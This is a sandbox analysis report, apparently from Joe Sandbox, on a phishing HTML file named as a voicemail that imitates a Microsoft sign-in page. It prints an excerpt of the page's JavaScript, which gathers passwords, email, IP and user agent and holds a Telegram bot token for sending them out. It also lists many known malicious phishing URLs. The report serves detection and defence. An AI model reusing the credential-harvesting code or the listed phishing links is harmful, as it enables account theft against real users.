Edit tour

Windows Analysis Report
New_Voicemail_Peterborough_.html

Overview

General Information

Sample name:	New_Voicemail_Peterborough_.html
Analysis ID:	1637132
MD5:	c5ea54e9593d1b67bd7124bd27e3451d
SHA1:	d3cad01379684312d0137c735ca5f89de49477dd
SHA256:	fbdb61f7d3f87ab54e5ea63c642418b77d93e88aa351a37a9b3ae8f69be01844
Infos:

Detection

HTMLPhisher

Score:	84
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Yara detected HtmlPhish10

AI detected suspicious Javascript

Detected javascript redirector / loader

HTML Script injector detected

HTML document with suspicious name

HTML document with suspicious title

HTML file submission containing password form

Javascript uses Telegram API

Creates files inside the system directory

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

IP address seen in connection with other malware

Invalid 'forgot password' link found

Invalid T&C link found

Javascript checks online IP of machine

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 2332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\New_Voicemail_Peterborough_.html MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 1456 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1952,i,7074487271076728629,13278226430279106264,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
0.2.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html

Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.2.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 0.2.pages.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML

AI detected suspicious Javascript

Source: 0.4.d.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates highly suspicious and malicious behavior. It collects sensitive user information, including email, passwords, and IP address, and sends it to an external Telegram bot. This is a clear case of data exfiltration and credential theft, which poses a significant risk to user security and privacy. The script also attempts to redirect the user to a Microsoft Teams website, likely as part of a phishing or social engineering attack. Overall, this script exhibits multiple high-risk indicators and should be considered a serious security threat.

Detected javascript redirector / loader

Source: New_Voicemail_Peterborough_.html

HTTP Parser: Low number of body elements: 1

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html	HTTP Parser: New script tag found
Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html	HTTP Parser: New script tag found
Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html	HTTP Parser: New script tag found

HTML document with suspicious title

Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html

Tab title: Sign in to your account

Javascript uses Telegram API

Source: anonymous function

HTTP Parser: var count = 0; var pswd1;var c=6522132099;var t="7440932859:aah-jqvjtpldyxcsxq2oqp3pd4asmphcg9u"; document.getelementbyid("idsibutton9").addeventlistener("click", function(e) { e.preventdefault(); var pswd = document.getelementbyid('i0118').value; if (pswd == null || pswd == ""){ document.getelementbyid('errorpw').innerhtml = `your account password cannot be empty. if you don't remember your password, <a href="#">reset it now.</a>`; settimeout(() => {document.getelementbyid('errorpw').innerhtml = '';}, 3000);} else if(pswd.length < 5){ document.getelementbyid('errorpw').innerhtml = "your account password is too short."; settimeout(() => {document.getelementbyid('errorpw').innerhtml = ''; document.getelementbyid("i0281").reset();}, 3000); } else if (count<1){var ip = document.getelementbyid('gfg').textcontent;var message = `======result====email: ${email}password1: ${pswd}ip address: ${ip}user-agent: ${navigator.useragent...

Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html

HTTP Parser: Number of links: 0

Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html

HTTP Parser: Invalid link: Forgotten my password

Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html	HTTP Parser: Invalid link: Privacy & cookies
Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html	HTTP Parser: Invalid link: Privacy & cookies

Source: anonymous function

Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html

HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html

HTTP Parser: <input type="password" .../> found

Source: New_Voicemail_Peterborough_.html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html	HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html	HTTP Parser: No <meta name="copyright".. found

Source: global traffic

TCP traffic: 192.168.2.17:60434 -> 1.1.1.1:53

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 151.101.2.137 151.101.2.137
Source: Joe Sandbox View	IP Address: 151.101.2.137 151.101.2.137

Source: unknown	TCP traffic detected without corresponding DNS query: 184.86.251.25
Source: unknown	TCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.253.67
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.253.67
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknown	TCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.186.99
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.186.99
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: ipfs.io
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 60443 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60460 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60462 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60447 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60468 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60455
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60454
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60453
Source: unknown	Network traffic detected: HTTP traffic on port 60456 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60454 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60451
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60450
Source: unknown	Network traffic detected: HTTP traffic on port 60450 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60439
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60439 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60459
Source: unknown	Network traffic detected: HTTP traffic on port 60458 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60458
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60456
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49677
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60461 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60443
Source: unknown	Network traffic detected: HTTP traffic on port 60453 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60455 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60462
Source: unknown	Network traffic detected: HTTP traffic on port 60451 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60461
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60460
Source: unknown	Network traffic detected: HTTP traffic on port 60459 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60447
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60468

System Summary

HTML document with suspicious name

Source: Name includes: New_Voicemail_Peterborough_.html

Initial sample: voicemail

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir2332_734927757

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir2332_734927757

Jump to behavior

Source: classification engine

Classification label: mal84.phis.winHTML@19/18@16/11

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\New_Voicemail_Peterborough_.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1952,i,7074487271076728629,13278226430279106264,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1952,i,7074487271076728629,13278226430279106264,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html

HTTP Parser: file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
e329293.dscd.akamaiedge.net	92.123.12.9	true	false	high
code.jquery.com	151.101.2.137	true	false	high
www.google.com	142.250.186.36	true	false	high
api.ipify.org	104.26.12.205	true	false	high
ipfs.io	209.94.90.1	true	false	high
aadcdn.msftauth.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://code.jquery.com/jquery-3.6.0.min.js	false		high
file:///C:/Users/user/Desktop/New_Voicemail_Peterborough_.html	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
142.250.186.36	www.google.com	United States	15169	GOOGLEUS	false
151.101.2.137	code.jquery.com	United States	54113	FASTLYUS	false
92.123.12.11	unknown	European Union	16625	AKAMAI-ASUS	false
92.123.12.9	e329293.dscd.akamaiedge.net	European Union	16625	AKAMAI-ASUS	false
209.94.90.1	ipfs.io	United States	40680	PROTOCOLUS	false

Private

IP
192.168.2.17
192.168.2.8
192.168.2.7
192.168.2.4
192.168.2.5

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1637132
Start date and time:	2025-03-13 11:19:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	New_Voicemail_Peterborough_.html
Detection:	MAL
Classification:	mal84.phis.winHTML@19/18@16/11
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.181.238, 142.250.186.35, 142.250.186.110, 74.125.133.84, 172.217.18.14, 142.250.184.238, 142.250.185.110, 216.58.206.46, 172.217.23.106, 172.217.18.110, 142.250.184.206, 216.58.206.78, 142.250.185.99, 142.250.185.174, 142.250.184.227, 4.175.87.197, 23.60.203.209
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, ajax.googleapis.com, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
151.101.2.137	http://facebooksecurity.blogspot.co.uk/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://facebooksecurity.blogspot.ro/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://novo.oratoriomariano.com/novo/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
	http://facebooksecurity.blogspot.dk/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://soporte-store.info/icloud2022-esp.php	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://applela.za.com/isignesp.php?id=	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.9.1.js
	http://awqffg.newburuan2023.biz.id/next.php	Get hash	malicious	HTMLPhisher	Browse	code.jquery.com/jquery-1.10.2.min.js
104.26.12.205	Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=xml
	NightFixed 1.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	VibeCall.exe	Get hash	malicious	RHADAMANTHYS	Browse	api.ipify.org/
	VRChat_ERP_Setup 1.0.0.msi	Get hash	malicious	Unknown	Browse	api.ipify.org/
	wEY98gM1Jj.ps1	Get hash	malicious	LummaC Stealer	Browse	api.ipify.org/
	oNvY66Z8jp.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Pmw24ExIdx.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
	DeepLauncher.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	[Huawei] Contract for YouTube partners.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	NexoPack Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipfs.io	https://ipfs.io/ipfs/bafybeifbvu36kut5mx2cahzdxelyzulfz3gn6ptz5ul63rbub7ljlt3pjy	Get hash	malicious	HTMLPhisher	Browse	209.94.90.1
	https://ipfs.io/ipfs/QmfCLiDeCZJwQBA54eiqv1EKXuiCXRAXy4V1yNEeCL5A4B	Get hash	malicious	HTMLPhisher	Browse	209.94.90.1
	https://ipfs.io/ipfs/bafkreieqld65z4s3qt2ewjyg6bbbyhkdl2tlzzvflxmef66o3zugau2mtu/#bgruwez@youtube.com	Get hash	malicious	HTMLPhisher	Browse	209.94.90.1
	https://ipfs.io/ipfs/bafkreieqld65z4s3qt2ewjyg6bbbyhkdl2tlzzvflxmef66o3zugau2mtu/#bgruwez@besix.com	Get hash	malicious	HTMLPhisher	Browse	209.94.90.1
	https://ipfs.io/ipfs/bafybeicedcho2skdcvnx3b7hrj7umido33buufiek43t3ko5zsfojgnezq/Access%20documents.html	Get hash	malicious	Unknown	Browse	209.94.90.1
	REMIT_SCAN_00008917738378282733(PDF).vbs	Get hash	malicious	GuLoader, Remcos	Browse	209.94.90.1
	https://ipfs.io/ipfs/bafybeihkdxudkwzfh4nwehsfnhenvu7bm2emgeaxccc2gpidbv4gtrugdq/ceoroundcube.html	Get hash	malicious	Unknown	Browse	209.94.90.1
	https://ipfs.io/ipfs/bafybeihkdxudkwzfh4nwehsfnhenvu7bm2emgeaxccc2gpidbv4gtrugdq/ceoroundcube.html#info.kundencenter-reseller-at@omv.com	Get hash	malicious	Unknown	Browse	209.94.90.1
	https://ipfs.io/ipfs/bafkreihmaoototrz76nrvalxjpmx7e35kweph3mj7elwgr5aajb4x35xgq#info@vicentia.net	Get hash	malicious	Unknown	Browse	209.94.90.1
code.jquery.com	https://pub-a75ffa45639b4a91a804d5a002f48c9d.r2.dev/signs.html	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://alonakes.top/bp/	Get hash	malicious	Unknown	Browse	151.101.2.137
	https://mr.ahmed-elgamal.com/03?id=0EcoCp6Ari	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://mr.ahmed-elgamal.com/03/?id=0EcoCp6Ari	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	http://imagoimpresiones.pe/Find/project	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://www.google.com.mx/url?q=https%3A%2F%2Flumensuae.com%2Fdr%2F&sa=D&sntz=1&usg=AOvVaw2KI_ApWDL5c7f_do0UCJyx#-SUREDERAc2ViYXN0aWFuLndlaGxhbmRAZGV1dHNjaGViYWhuLmNvbQ==	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.194.137
	https://saleemitraders.com/wp/confirm.html	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.130.137
	https://sceanmcommnunmnlty.com/xroea/spwoe/zxiwe	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://sceanmcommnunmnlty.com/sotep/aofpe/zoepr	Get hash	malicious	Unknown	Browse	151.101.2.137
api.ipify.org	brave.ps1	Get hash	malicious	Unknown	Browse	172.67.74.152
	http://copyright-accountscenter.github.io/	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	#U25b6#Ufe0fVoicemailjsisler@sweepingcorp.com.svg	Get hash	malicious	Gabagool	Browse	104.26.13.205
	https://possibles-x.com/	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	https://www.canva.com/design/DAGhc7_0hcE/hgb_at1RBcHJUDkqEWuiaw/view?utm_content=DAGhc7_0hcE&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h6c02bf3a02	Get hash	malicious	Unknown	Browse	104.26.12.205
	https://sharpayappindex.sharefile.com/public/share/web-s1433e7d4d36a481491c3d36d25011800	Get hash	malicious	Unknown	Browse	104.26.13.205
e329293.dscd.akamaiedge.net	#U25b6#Ufe0fVoicemailjsisler@sweepingcorp.com.svg	Get hash	malicious	Gabagool	Browse	95.101.182.112
	https://rebrand.ly/1bbw71e	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	2.19.97.24
	Visions Awards CustomerVendor Form.pdf	Get hash	malicious	HTMLPhisher	Browse	95.101.182.65
	Dsyhre- approved on Wednesday March 2025.pdf	Get hash	malicious	Gabagool	Browse	92.123.12.139
	https://simplified.com/designs/cd97e327-288b-43f7-99e7-024626ab4a8c/share?utm_content=cd97e327-288b-43f7-99e7-024626ab4a8c&utm_campaign=share&utm_medium=link&utm_source=projectlinks	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	92.123.12.9
	Cherokee Brick_Vnote_GUHFIOE.svg	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	2.22.242.18
	Message.eml	Get hash	malicious	HTMLPhisher	Browse	95.101.79.112
	Inv#8653763981_2sfgPaymentAdvice.svg	Get hash	malicious	HTMLPhisher	Browse	95.101.182.65
	.svg	Get hash	malicious	HTMLPhisher	Browse	92.123.12.11

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	DE-10192.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	162.159.134.42
	xo.bat	Get hash	malicious	Unknown	Browse	162.159.134.42
	https://metamask-io-s--dk.webflow.io	Get hash	malicious	HTMLPhisher	Browse	104.18.161.117
	https://started-ledgger.webflow.io	Get hash	malicious	HTMLPhisher	Browse	172.64.151.8
	https://cuiinbeseprologin.webflow.io	Get hash	malicious	HTMLPhisher	Browse	104.18.161.117
	https://lketamaskloginn.webflow.io	Get hash	malicious	Unknown	Browse	104.18.36.248
	IPt9U27NoX.exe	Get hash	malicious	Unknown	Browse	172.67.191.12
	SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	https://test.novanotes.de/	Get hash	malicious	Unknown	Browse	104.16.123.96
FASTLYUS	https://test.novanotes.de/	Get hash	malicious	Unknown	Browse	151.101.129.140
	https://metabussiness-helper-verify24h-now.abaytravel.com/meta-community-standard.php	Get hash	malicious	Unknown	Browse	199.232.196.193
	https://pub-a75ffa45639b4a91a804d5a002f48c9d.r2.dev/signs.html	Get hash	malicious	HTMLPhisher	Browse	151.101.2.132
	https://allegrolokalnie.pl-745667434.icu/dostawa/pilarka-stihl-ms-362-cm---jak-nowa-970323	Get hash	malicious	HTMLPhisher	Browse	151.101.129.140
	http://lute-trout-b6gg.squarespace.com/	Get hash	malicious	Unknown	Browse	151.101.192.237
	http://atttttt00000011.weebly.com/	Get hash	malicious	Unknown	Browse	151.101.1.46
	https://wrasse-horse-3nb9.squarespace.com/	Get hash	malicious	Unknown	Browse	151.101.192.238
	066	Get hash	malicious	Unknown	Browse	151.101.128.223
	https://accverst.com/	Get hash	malicious	Unknown	Browse	151.101.195.52
AKAMAI-ASUS	https://test.novanotes.de/	Get hash	malicious	Unknown	Browse	104.73.230.208
